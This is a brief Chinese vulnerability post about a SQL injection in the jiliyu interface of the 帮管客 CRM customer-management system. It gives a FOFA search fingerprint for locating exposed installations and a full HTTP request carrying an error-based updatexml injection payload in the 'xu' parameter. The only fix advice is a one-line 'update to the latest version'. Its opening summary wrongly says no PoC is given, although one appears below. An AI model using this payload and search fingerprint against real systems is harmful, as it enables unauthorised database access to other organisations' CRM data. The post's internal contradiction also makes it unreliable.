帮管客CRM的jiliyu接口被发现存在SQL漏洞,该系统专注为企业提供客户关系管理解决方案。漏洞影响范围及POC未详细说明,但修复建议为更新到最新版本。
1.漏洞介绍
帮管客CRM客户管理系统专注于为企业提供crm客户关系管理、crm管理系统、crm软件产品及企业销售管理流程解决方案服务,助力企业业绩增长。帮管客CRM jiliyu接口存在SQL漏洞
2.漏洞编号
| CVE | CNVD | CNNVD |
|---|---|---|
| - | - | - |
3.影响范围
| 名称 | 版本号 |
|---|---|
| - | - |
4.检索特征
FOFA:“帮管客-CRM”
5.POC
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7f,(select%20md5(1)),0x7f),1)) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
6.修复建议
更新到最新版本
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
